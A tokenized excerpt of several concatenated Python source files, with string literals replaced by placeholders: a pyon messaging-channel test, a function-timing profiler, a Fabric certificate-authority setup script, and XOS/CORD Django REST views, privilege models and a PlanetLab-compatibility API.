<NUM_LIT:5> ) : <EOL> p . send ( '<STR_LIT>' + str ( counter ) ) <EOL> counter += <NUM_LIT:1> <EOL> def every_three ( ) : <EOL> p = self . container . node . channel ( PublisherChannel ) <EOL> p . _send_name = NameTrio ( bootstrap . get_sys_name ( ) , '<STR_LIT>' ) <EOL> counter = <NUM_LIT:0> <EOL> while not self . publish_three . wait ( timeout = <NUM_LIT:3> ) : <EOL> p . send ( '<STR_LIT>' + str ( counter ) ) <EOL> counter += <NUM_LIT:1> <EOL> self . publish_five = Event ( ) <EOL> self . publish_three = Event ( ) <EOL> self . five_events = Queue ( ) <EOL> self . three_events = Queue ( ) <EOL> gl_every_five = spawn ( every_five ) <EOL> gl_every_three = spawn ( every_three ) <EOL> def listen ( lch ) : <EOL> """<STR_LIT>""" <EOL> lch . _queue_auto_delete = False <EOL> lch . setup_listener ( NameTrio ( bootstrap . get_sys_name ( ) , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> lch . _bind ( '<STR_LIT>' ) <EOL> lch . start_consume ( ) <EOL> while True : <EOL> try : <EOL> newchan = lch . accept ( ) <EOL> m , h , d = newchan . recv ( ) <EOL> count = m . rsplit ( '<STR_LIT:U+002C>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> if m . startswith ( '<STR_LIT>' ) : <EOL> self . five_events . put ( int ( count ) ) <EOL> newchan . ack ( d ) <EOL> elif m . startswith ( '<STR_LIT>' ) : <EOL> self . three_events . put ( int ( count ) ) <EOL> newchan . ack ( d ) <EOL> else : <EOL> raise StandardError ( "<STR_LIT>" % m ) <EOL> except ChannelClosedError : <EOL> break <EOL> lch = self . container . node . channel ( SubscriberChannel ) <EOL> gl_listen = spawn ( listen , lch ) <EOL> def do_cleanups ( gl_e5 , gl_e3 , gl_l , lch ) : <EOL> self . publish_five . set ( ) <EOL> self . publish_three . set ( ) <EOL> gl_e5 . join ( timeout = <NUM_LIT:5> ) <EOL> gl_e3 . join ( timeout = <NUM_LIT:5> ) <EOL> lch . stop_consume ( ) <EOL> lch . _destroy_queue ( ) <EOL> lch . close ( ) <EOL> gl_listen . join ( timeout = <NUM_LIT:5> ) <EOL> self . addCleanup ( do_cleanups , gl_every_five , gl_every_three , gl_listen , lch ) <EOL> ch = self . container . node . channel ( RecvChannel ) <EOL> ch . _recv_name = NameTrio ( bootstrap . get_sys_name ( ) , '<STR_LIT>' ) <EOL> ch . _queue_auto_delete = False <EOL> ch . _transport . qos_impl ( prefetch_count = <NUM_LIT> ) <EOL> def cleanup_channel ( thech ) : <EOL> thech . _destroy_queue ( ) <EOL> thech . close ( ) <EOL> self . addCleanup ( cleanup_channel , ch ) <EOL> ch . _declare_exchange ( ch . _recv_name . exchange ) <EOL> ch . _declare_queue ( ch . _recv_name . queue ) <EOL> ch . _purge ( ) <EOL> ch . _bind ( '<STR_LIT>' ) <EOL> self . five_events . get ( timeout = <NUM_LIT:10> ) <EOL> self . assertTupleEqual ( ( <NUM_LIT:1> , <NUM_LIT:0> ) , ch . get_stats ( ) ) <EOL> ch . start_consume ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> self . assertEquals ( ch . _recv_queue . qsize ( ) , <NUM_LIT:1> ) <EOL> m , h , d = ch . recv ( timeout = <NUM_LIT:0> ) <EOL> self . assertEquals ( m , "<STR_LIT>" ) <EOL> ch . ack ( d ) <EOL> self . assertRaises ( PQueue . Empty , ch . recv , timeout = <NUM_LIT:0> ) <EOL> ch . stop_consume ( ) <EOL> self . five_events . get ( timeout = <NUM_LIT:10> ) <EOL> ch . start_consume ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> while True : <EOL> try : <EOL> m , h , d = ch . recv ( timeout = <NUM_LIT:0> ) <EOL> self . assertTrue ( m . startswith ( '<STR_LIT>' ) ) <EOL> ch . ack ( d ) <EOL> except PQueue . Empty : <EOL> ch . stop_consume ( ) <EOL> break <EOL> self . five_events . get ( timeout = <NUM_LIT:10> ) <EOL> ch . start_consume ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> m , h , d = ch . recv ( timeout = <NUM_LIT:0> ) <EOL> self . assertTrue ( m . startswith ( '<STR_LIT>' ) ) <EOL> ch . reject ( d , requeue = True ) <EOL> num = self . five_events . get ( timeout = <NUM_LIT:10> ) <EOL> self . assertEquals ( num , <NUM_LIT:3> ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> expect = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> while True : <EOL> try : <EOL> m , h , d = ch . recv ( timeout = <NUM_LIT:0> ) <EOL> self . assertTrue ( m . startswith ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( m , expect . pop ( <NUM_LIT:0> ) ) <EOL> ch . ack ( d ) <EOL> except PQueue . Empty : <EOL> ch . stop_consume ( ) <EOL> self . assertListEqual ( expect , [ ] ) <EOL> break <EOL> while not self . three_events . empty ( ) : <EOL> self . three_events . get ( timeout = <NUM_LIT:0> ) <EOL> ch2 = self . container . node . channel ( RecvChannel ) <EOL> ch2 . setup_listener ( NameTrio ( bootstrap . get_sys_name ( ) , "<STR_LIT>" ) ) <EOL> ch . _destroy_binding ( ) <EOL> ch . _bind ( '<STR_LIT>' ) <EOL> ch2 . _destroy_queue ( ) <EOL> ch2 . close ( ) <EOL> self . three_events . get ( timeout = <NUM_LIT:10> ) <EOL> ch . start_consume ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> self . assertEquals ( ch . _recv_queue . qsize ( ) , <NUM_LIT:1> ) <EOL> m , h , d = ch . recv ( timeout = <NUM_LIT:0> ) <EOL> self . assertTrue ( m . startswith ( '<STR_LIT>' ) ) <EOL> ch . ack ( d ) <EOL> self . three_events . get ( timeout = <NUM_LIT:10> ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> m , h , d = ch . recv ( timeout = <NUM_LIT:0> ) <EOL> ch . reject ( d , requeue = True ) <EOL> ch . stop_consume ( ) <EOL> ch . start_consume ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> self . assertEquals ( ch . _recv_queue . qsize ( ) , <NUM_LIT:1> ) <EOL> m2 , h2 , d2 = ch . recv ( timeout = <NUM_LIT:0> ) <EOL> self . assertEquals ( m , m2 ) <EOL> ch . stop_consume ( ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestChannelIntLocalTransport ( TestChannelInt ) : <EOL> def setUp ( self ) : <EOL> self . patch_cfg ( '<STR_LIT>' , { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : None } } , <EOL> '<STR_LIT>' : CFG [ '<STR_LIT>' ] [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : CFG [ '<STR_LIT>' ] } ) <EOL> self . _start_container ( ) </s>
<s> """<STR_LIT>""" <EOL> from time import time <EOL> from types import MethodType <EOL> from inspect import getmembers , ismethod <EOL> from re import match <EOL> from threading import Lock <EOL> from traceback import extract_stack <EOL> from pyon . util import log <EOL> class _Wrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , timer , function , name , logger ) : <EOL> self . _original = function <EOL> self . _timer = timer <EOL> self . _name = name <EOL> self . _simultaneous = <NUM_LIT:0> <EOL> self . _log = logger <EOL> def proxy ( self , * a , ** b ) : <EOL> if self . _log : <EOL> for frame in reversed ( extract_stack ( ) ) : <EOL> file = frame [ <NUM_LIT:0> ] <EOL> if not file . endswith ( '<STR_LIT>' ) : <EOL> line = frame [ <NUM_LIT:1> ] <EOL> self . _log . info ( self . _name + '<STR_LIT>' + file + '<STR_LIT::>' + str ( line ) ) <EOL> break <EOL> tuple = extract_stack ( ) [ - <NUM_LIT:2> ] <EOL> self . _simultaneous += <NUM_LIT:1> <EOL> start = self . _timer . _start_timing ( ) <EOL> try : <EOL> return self . _original ( * a , ** b ) <EOL> finally : <EOL> self . _timer . _stop_timing ( self , start ) <EOL> self . _simultaneous -= <NUM_LIT:1> <EOL> def __str__ ( self ) : <EOL> return self . _name <EOL> class _Call ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , index ) : <EOL> self . proportional_time = <NUM_LIT:0> <EOL> self . _index = index <EOL> def add_time ( self , elapsed ) : <EOL> self . proportional_time += elapsed <EOL> def start ( self , time ) : <EOL> self . _start_time = time <EOL> def stop ( self , time ) : <EOL> self . clock_time = time - self . _start_time <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . _index <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> class MonkeyTimer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nooverlap = False ) : <EOL> self . _proportional_time = { } <EOL> self . _clock_time = { } <EOL> self . _total_count = { } <EOL> self . _lock = Lock ( ) <EOL> self . _last_tick = None <EOL> self . _currently_running = [ ] <EOL> self . _max_simultaneous = <NUM_LIT:0> <EOL> self . _call_index = <NUM_LIT:1> <EOL> self . logger = None <EOL> def set_logger ( self , logger ) : <EOL> """<STR_LIT>""" <EOL> self . logger = logger <EOL> def _add_time ( self , elapsed ) : <EOL> running_count = len ( self . _currently_running ) <EOL> if running_count : <EOL> self . _max_simultaneous = max ( self . _max_simultaneous , running_count ) <EOL> delta = elapsed / running_count <EOL> for call in self . _currently_running : <EOL> call . add_time ( delta ) <EOL> def _start_timing ( self ) : <EOL> self . _lock . acquire ( ) <EOL> this_tick = time ( ) <EOL> new_call = _Call ( self . _call_index ) <EOL> self . _call_index += <NUM_LIT:1> <EOL> new_call . start ( this_tick ) <EOL> if self . _last_tick : <EOL> self . _add_time ( this_tick - self . _last_tick ) <EOL> self . _last_tick = this_tick <EOL> self . _currently_running . append ( new_call ) <EOL> self . _lock . release ( ) <EOL> return new_call <EOL> def _stop_timing ( self , wrapper , call ) : <EOL> self . _lock . acquire ( ) <EOL> this_tick = time ( ) <EOL> call . stop ( this_tick ) <EOL> self . _add_time ( this_tick - self . _last_tick ) <EOL> self . _last_tick = this_tick <EOL> self . _currently_running . remove ( call ) <EOL> self . _lock . release ( ) <EOL> key = str ( wrapper ) <EOL> if key not in self . _proportional_time : <EOL> self . _proportional_time [ key ] = <NUM_LIT:0> <EOL> self . _clock_time [ key ] = <NUM_LIT:0> <EOL> self . _total_count [ key ] = <NUM_LIT:0> <EOL> self . _proportional_time [ key ] += call . proportional_time <EOL> self . _clock_time [ key ] += call . clock_time <EOL> self . _total_count [ key ] += <NUM_LIT:1> <EOL> def patch_function ( self , function , name , logger = None ) : <EOL> """<STR_LIT>""" <EOL> wrapper_log = logger if logger else self . logger <EOL> wrapper = _Wrapper ( self , function , name , wrapper_log ) <EOL> return wrapper . proxy <EOL> def patch_class_one ( self , clazz , function , name ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( clazz , '<STR_LIT>' ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> timer = self <EOL> class _ProxyClass ( clazz ) : <EOL> def __init__ ( self , * a , ** b ) : <EOL> orig = clazz . __dict__ [ function . __name__ ] <EOL> self . __dict__ [ function . __name__ ] = MethodType ( timer . patch_function ( orig , name ) , self , _ProxyClass ) <EOL> clazz . __init__ ( self , * a , ** b ) <EOL> _ProxyClass . _monkey_timer_patched = True <EOL> return _ProxyClass <EOL> def patch_class_all ( self , clazz , prefix , regex = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( clazz , '<STR_LIT>' ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> timer = self <EOL> class _ProxyClass ( clazz ) : <EOL> def __init__ ( self , * a , ** b ) : <EOL> for name , function in getmembers ( clazz , predicate = ismethod ) : <EOL> if not regex or match ( regex , name ) : <EOL> self . __dict__ [ name ] = MethodType ( timer . patch_function ( function , prefix + name ) , self , _ProxyClass ) <EOL> clazz . __init__ ( self , * a , ** b ) <EOL> _ProxyClass . _monkey_timer_patched = True <EOL> return _ProxyClass <EOL> def results ( self ) : <EOL> """<STR_LIT>""" <EOL> lines = [ "<STR_LIT>" ] <EOL> self . _lock . acquire ( ) <EOL> for key in self . _proportional_time . keys ( ) : <EOL> time = self . _proportional_time [ key ] <EOL> clocktime = self . _clock_time [ key ] <EOL> count = self . _total_count [ key ] <EOL> lines . append ( "<STR_LIT>" % ( key , time , count , time / count , clocktime , count , clocktime / count ) ) <EOL> self . _lock . release ( ) <EOL> return "<STR_LIT:\n>" . join ( lines ) + ( "<STR_LIT>" % self . _max_simultaneous ) <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _lock . acquire ( ) <EOL> self . _proportional_time = { } <EOL> self . _clock_time = { } <EOL> self . _total_count = { } <EOL> self . _lock . release ( ) </s>
<s> from __future__ import with_statement <EOL> from fabric . api import * <EOL> import os <EOL> import re <EOL> import time <EOL> ca_config_content = "<STR_LIT>" <EOL> ca_dir = None <EOL> def setcadir ( ) : <EOL> global ca_dir <EOL> if not ca_dir : <EOL> ca_dir = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in ca_dir : <EOL> homedir = os . getenv ( "<STR_LIT>" ) <EOL> ca_dir = os . path . join ( homedir , ca_dir . strip ( '<STR_LIT>' ) ) <EOL> def mkca ( ) : <EOL> setcadir ( ) <EOL> global ca_dir <EOL> if os . path . exists ( ca_dir ) : <EOL> do_del = prompt ( '<STR_LIT>' % ca_dir , default = '<STR_LIT:Y>' ) <EOL> if do_del == '<STR_LIT:Y>' or do_del == '<STR_LIT:y>' : <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> rootca_common_name = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> rootca_email_address = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> revocation_url = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> o_path = os . path . join ( ca_dir , "<STR_LIT>" ) <EOL> o = open ( o_path , '<STR_LIT>' ) <EOL> openssl_cnf = ca_config_content <EOL> openssl_cnf = re . sub ( '<STR_LIT>' , rootca_common_name , openssl_cnf ) <EOL> openssl_cnf = re . sub ( '<STR_LIT>' , rootca_email_address , openssl_cnf ) <EOL> openssl_cnf = re . sub ( '<STR_LIT>' , revocation_url , openssl_cnf ) <EOL> o . write ( openssl_cnf ) <EOL> o . close ( ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> local ( "<STR_LIT>" % ca_dir ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> def mkrootcert ( ) : <EOL> setcadir ( ) <EOL> global ca_dir <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % ( ca_dir ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> def mkcontainercert ( ) : <EOL> setcadir ( ) <EOL> global ca_dir <EOL> key_duration = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> key_filename = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> local ( '<STR_LIT>' % ( ca_dir , key_filename , key_filename , key_duration ) ) <EOL> local ( '<STR_LIT>' % ( ca_dir , key_filename , key_filename ) ) <EOL> local ( '<STR_LIT>' % ( ca_dir , key_filename ) ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % ( ca_dir , key_filename , ca_dir , key_filename ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' </s>
<s> from rest_framework . decorators import api_view <EOL> from rest_framework . response import Response <EOL> from rest_framework . reverse import reverse <EOL> from rest_framework import serializers <EOL> from rest_framework import generics <EOL> from rest_framework import status <EOL> from core . models import * <EOL> from django . forms import widgets <EOL> from services . cord . models import VOLTTenant , VOLTService , CordSubscriberRoot <EOL> from xos . apibase import XOSListCreateAPIView , XOSRetrieveUpdateDestroyAPIView , XOSPermissionDenied <EOL> from api . xosapi_helpers import PlusModelSerializer , XOSViewSet , ReadOnlyField <EOL> def get_default_volt_service ( ) : <EOL> volt_services = VOLTService . get_service_objects ( ) . all ( ) <EOL> if volt_services : <EOL> return volt_services [ <NUM_LIT:0> ] . id <EOL> return None <EOL> class VOLTTenantForAPI ( VOLTTenant ) : <EOL> class Meta : <EOL> proxy = True <EOL> app_label = "<STR_LIT>" <EOL> @ property <EOL> def subscriber ( self ) : <EOL> return self . subscriber_root . id <EOL> @ subscriber . setter <EOL> def subscriber ( self , value ) : <EOL> self . subscriber_root = value <EOL> @ property <EOL> def related ( self ) : <EOL> related = { } <EOL> if self . vcpe : <EOL> related [ "<STR_LIT>" ] = self . vcpe . id <EOL> if self . vcpe . instance : <EOL> related [ "<STR_LIT>" ] = self . vcpe . instance . id <EOL> related [ "<STR_LIT>" ] = self . vcpe . instance . name <EOL> related [ "<STR_LIT>" ] = self . vcpe . wan_container_ip <EOL> if self . vcpe . instance . node : <EOL> related [ "<STR_LIT>" ] = self . vcpe . instance . node . name <EOL> return related <EOL> class VOLTTenantSerializer ( PlusModelSerializer ) : <EOL> id = ReadOnlyField ( ) <EOL> service_specific_id = serializers . CharField ( required = False ) <EOL> s_tag = serializers . CharField ( ) <EOL> c_tag = serializers . CharField ( ) <EOL> subscriber = serializers . PrimaryKeyRelatedField ( queryset = CordSubscriberRoot . get_tenant_objects ( ) . all ( ) , required = False ) <EOL> related = serializers . DictField ( required = False ) <EOL> property_fields = [ "<STR_LIT>" ] <EOL> humanReadableName = serializers . SerializerMethodField ( "<STR_LIT>" ) <EOL> class Meta : <EOL> model = VOLTTenantForAPI <EOL> fields = ( '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def getHumanReadableName ( self , obj ) : <EOL> return obj . __unicode__ ( ) <EOL> class VOLTTenantViewSet ( XOSViewSet ) : <EOL> base_name = "<STR_LIT>" <EOL> method_name = "<STR_LIT>" <EOL> method_kind = "<STR_LIT>" <EOL> queryset = VOLTTenantForAPI . get_tenant_objects ( ) . all ( ) <EOL> serializer_class = VOLTTenantSerializer <EOL> @ classmethod <EOL> def get_urlpatterns ( self , api_path = "<STR_LIT>" ) : <EOL> patterns = super ( VOLTTenantViewSet , self ) . get_urlpatterns ( api_path = api_path ) <EOL> return patterns <EOL> def list ( self , request ) : <EOL> queryset = self . filter_queryset ( self . get_queryset ( ) ) <EOL> c_tag = self . request . query_params . get ( '<STR_LIT>' , None ) <EOL> if c_tag is not None : <EOL> ids = [ x . id for x in queryset if x . get_attribute ( "<STR_LIT>" , None ) == c_tag ] <EOL> queryset = queryset . filter ( id__in = ids ) <EOL> s_tag = self . request . query_params . get ( '<STR_LIT>' , None ) <EOL> if s_tag is not None : <EOL> ids = [ x . id for x in queryset if x . get_attribute ( "<STR_LIT>" , None ) == s_tag ] <EOL> queryset = queryset . filter ( id__in = ids ) <EOL> serializer = self . get_serializer ( queryset , many = True ) <EOL> return Response ( serializer . data ) </s>
<s> import os <EOL> import datetime <EOL> from collections import defaultdict <EOL> from django . db import models <EOL> from django . db . models import F , Q <EOL> from core . models import PlCoreBase , User , Controller <EOL> from core . models . plcorebase import StrippedCharField <EOL> from core . models import Controller , ControllerLinkManager , ControllerLinkDeletionManager <EOL> class ControllerUser ( PlCoreBase ) : <EOL> objects = ControllerLinkManager ( ) <EOL> deleted_objects = ControllerLinkDeletionManager ( ) <EOL> user = models . ForeignKey ( User , related_name = '<STR_LIT>' ) <EOL> controller = models . ForeignKey ( Controller , related_name = '<STR_LIT>' ) <EOL> kuser_id = StrippedCharField ( null = True , blank = True , max_length = <NUM_LIT:200> , help_text = "<STR_LIT>" ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : return u'<STR_LIT>' % ( self . controller , self . user ) <EOL> @ staticmethod <EOL> def select_by_user ( user ) : <EOL> if user . is_admin : <EOL> qs = ControllerUser . objects . all ( ) <EOL> else : <EOL> users = User . select_by_user ( user ) <EOL> qs = ControllerUser . objects . filter ( user__in = users ) <EOL> return qs <EOL> def can_update ( self , user ) : <EOL> return user . can_update_root ( ) <EOL> class ControllerSitePrivilege ( PlCoreBase ) : <EOL> objects = ControllerLinkManager ( ) <EOL> deleted_objects = ControllerLinkDeletionManager ( ) <EOL> controller = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> site_privilege = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> role_id = StrippedCharField ( null = True , blank = True , max_length = <NUM_LIT:200> , db_index = True , help_text = "<STR_LIT>" ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : return u'<STR_LIT>' % ( self . controller , self . site_privilege ) <EOL> def can_update ( self , user ) : <EOL> if user . is_readonly : <EOL> return False <EOL> if user . is_admin : <EOL> return True <EOL> cprivs = ControllerSitePrivilege . objects . filter ( site_privilege__user = user ) <EOL> for cpriv in dprivs : <EOL> if cpriv . site_privilege . role . role == [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return True <EOL> return False <EOL> @ staticmethod <EOL> def select_by_user ( user ) : <EOL> if user . is_admin : <EOL> qs = ControllerSitePrivilege . objects . all ( ) <EOL> else : <EOL> cpriv_ids = [ cp . id for cp in ControllerSitePrivilege . objects . filter ( site_privilege__user = user ) ] <EOL> qs = ControllerSitePrivilege . objects . filter ( id__in = cpriv_ids ) <EOL> return qs <EOL> class ControllerSlicePrivilege ( PlCoreBase ) : <EOL> objects = ControllerLinkManager ( ) <EOL> deleted_objects = ControllerLinkDeletionManager ( ) <EOL> controller = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> slice_privilege = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> role_id = StrippedCharField ( null = True , blank = True , max_length = <NUM_LIT:200> , db_index = True , help_text = "<STR_LIT>" ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : return u'<STR_LIT>' % ( self . controller , self . slice_privilege ) <EOL> def can_update ( self , user ) : <EOL> if user . is_readonly : <EOL> return False <EOL> if user . is_admin : <EOL> return True <EOL> cprivs = ControllerSlicePrivilege . objects . filter ( slice_privilege__user = user ) <EOL> for cpriv in dprivs : <EOL> if cpriv . role . role == [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return True <EOL> return False <EOL> @ staticmethod <EOL> def select_by_user ( user ) : <EOL> if user . is_admin : <EOL> qs = ControllerSlicePrivilege . objects . all ( ) <EOL> else : <EOL> cpriv_ids = [ cp . id for cp in ControllerSlicePrivilege . objects . filter ( slice_privilege__user = user ) ] <EOL> qs = ControllerSlicePrivilege . objects . filter ( id__in = cpriv_ids ) <EOL> return qs </s>
<s> import os <EOL> import json <EOL> import socket <EOL> import sys <EOL> import time <EOL> import traceback <EOL> import xmlrpclib <EOL> from core . models import Slice , Instance , ServiceClass , Reservation , Tag , Network , User , Node , Image , Deployment , Site , NetworkTemplate , NetworkSlice <EOL> from django . http import HttpResponse <EOL> from django . views . decorators . csrf import csrf_exempt <EOL> def ps_id_to_pl_id ( x ) : <EOL> return <NUM_LIT> + x <EOL> def pl_id_to_ps_id ( x ) : <EOL> return x - <NUM_LIT> <EOL> def pl_slice_id ( slice , slice_remap = { } ) : <EOL> if slice . name in slice_remap : <EOL> return int ( slice_remap [ slice . name ] [ <NUM_LIT:1> ] ) <EOL> else : <EOL> return ps_id_to_pl_id ( slice . id ) <EOL> def pl_slicename ( slice , slice_remap = { } ) : <EOL> if slice . name in slice_remap : <EOL> return slice_remap [ slice . name ] [ <NUM_LIT:0> ] <EOL> else : <EOL> return slice . name <EOL> def filter_fields ( src , fields ) : <EOL> dest = { } <EOL> for ( key , value ) in src . items ( ) : <EOL> if ( not fields ) or ( key in fields ) : <EOL> dest [ key ] = value <EOL> return dest <EOL> def GetSlices ( filter = { } , slice_remap = { } ) : <EOL> ps_slices = Slice . objects . all ( ) <EOL> slices = [ ] <EOL> for ps_slice in ps_slices : <EOL> if ( filter ) and ( "<STR_LIT:name>" in filter ) : <EOL> remapped_name = slice_remap . get ( ps_slice . name , ( ps_slice . name , ) ) [ <NUM_LIT:0> ] <EOL> if ( remapped_name != filter [ "<STR_LIT:name>" ] ) : <EOL> continue <EOL> node_ids = [ ] <EOL> for ps_instance in ps_slice . instances . all ( ) : <EOL> node_ids . append ( ps_id_to_pl_id ( ps_instance . node . id ) ) <EOL> slice = { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : pl_slice_id ( ps_slice , slice_remap ) , <EOL> "<STR_LIT>" : node_ids , <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1000> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : ps_id_to_pl_id ( ps_slice . site_id ) , <EOL> "<STR_LIT:name>" : pl_slicename ( ps_slice , slice_remap ) , <EOL> "<STR_LIT>" : ps_slice . name } <EOL> slices . append ( slice ) <EOL> return slices <EOL> def GetNodes ( node_ids = None , fields = None , slice_remap = { } ) : <EOL> if node_ids : <EOL> ps_nodes = Node . objects . filter ( id__in = [ pl_id_to_ps_id ( nid ) for nid in node_ids ] ) <EOL> else : <EOL> ps_nodes = Node . objects . all ( ) <EOL> nodes = [ ] <EOL> for ps_node in ps_nodes : <EOL> slice_ids = [ ] <EOL> for ps_instance in ps_node . instances . all ( ) : <EOL> slice_ids . append ( pl_slice_id ( ps_instance . slice , slice_remap ) ) <EOL> node = { "<STR_LIT>" : ps_id_to_pl_id ( ps_node . id ) , <EOL> "<STR_LIT>" : ps_id_to_pl_id ( ps_node . site_id ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : ps_node . name . lower ( ) , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : slice_ids , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : [ ] } <EOL> nodes . append ( node ) <EOL> nodes = [ filter_fields ( node , fields ) for node in nodes ] <EOL> return nodes <EOL> def GetTags ( slicename , node_id ) : <EOL> return { } <EOL> def GetSites ( slice_remap = { } ) : <EOL> ps_sites = Site . objects . all ( ) <EOL> sites = [ ] <EOL> for ps_site in ps_sites : <EOL> slice_ids = [ ] <EOL> for ps_slice in ps_site . slices . all ( ) : <EOL> slice_ids . append ( pl_slice_id ( ps_slice , slice_remap ) ) <EOL> node_ids = [ ] <EOL> for ps_node in ps_site . nodes . all ( ) : <EOL> node_ids . append ( ps_id_to_pl_id ( ps_node . id ) ) <EOL> if ps_site . location : <EOL> longitude = ps_site . location . longitude <EOL> latitude = ps_site . location . latitude <EOL> else : <EOL> longitude = <NUM_LIT:0> <EOL> latitude = <NUM_LIT:0> <EOL> site = { "<STR_LIT>" : ps_id_to_pl_id ( ps_site . id ) , <EOL> "<STR_LIT>" : node_ids , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : <NUM_LIT:100> , <EOL> "<STR_LIT>" : <NUM_LIT:1000> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : ps_site . abbreviated_name , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:name>" : ps_site . name , <EOL> "<STR_LIT:url>" : None , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : float ( longitude ) , <EOL> "<STR_LIT>" : float ( latitude ) , <EOL> "<STR_LIT>" : slice_ids , <EOL> "<STR_LIT>" : ps_site . login_base , <EOL> "<STR_LIT>" : None } <EOL> sites . append ( site ) <EOL> return sites <EOL> def GetInterfaces ( slicename , node_ids , return_nat = False , return_private = False ) : <EOL> interfaces = [ ] <EOL> ps_slices = Slice . objects . filter ( name = slicename ) <EOL> for ps_slice in ps_slices : <EOL> for ps_instance in ps_slice . instances . all ( ) : <EOL> node_id = ps_id_to_pl_id ( ps_instance . node_id ) <EOL> if node_id in node_ids : <EOL> ps_node = ps_instance . node <EOL> ip = socket . gethostbyname ( ps_node . name . strip ( ) ) <EOL> found_labeled_network = False <EOL> for port in ps_instance . ports . all ( ) : <EOL> if ( not port . ip ) : <EOL> continue <EOL> if ( port . network . owner != ps_slice ) : <EOL> continue <EOL> if port . network . labels and ( "<STR_LIT>" in port . network . labels ) : <EOL> ip = port . ip <EOL> found_labeled_network = True <EOL> if not found_labeled_network : <EOL> for port in ps_instance . ports . all ( ) : <EOL> if ( not port . ip ) : <EOL> continue <EOL> template = port . network . template <EOL> if ( template . visibility == "<STR_LIT>" ) and ( template . translation == "<STR_LIT:none>" ) : <EOL> ip = port . ip <EOL> if return_nat : <EOL> ip = None <EOL> for port in ps_instance . ports . all ( ) : <EOL> if ( not port . ip ) : <EOL> continue <EOL> template = port . network . template <EOL> if ( template . visibility == "<STR_LIT>" ) and ( template . translation == "<STR_LIT>" ) : <EOL> ip = port . ip <EOL> if not ip : <EOL> continue <EOL> if return_private : <EOL> ip = None <EOL> for port in ps_instance . ports . all ( ) : <EOL> if ( not port . ip ) : <EOL> continue <EOL> template = port . network . template <EOL> if ( template . visibility == "<STR_LIT>" ) 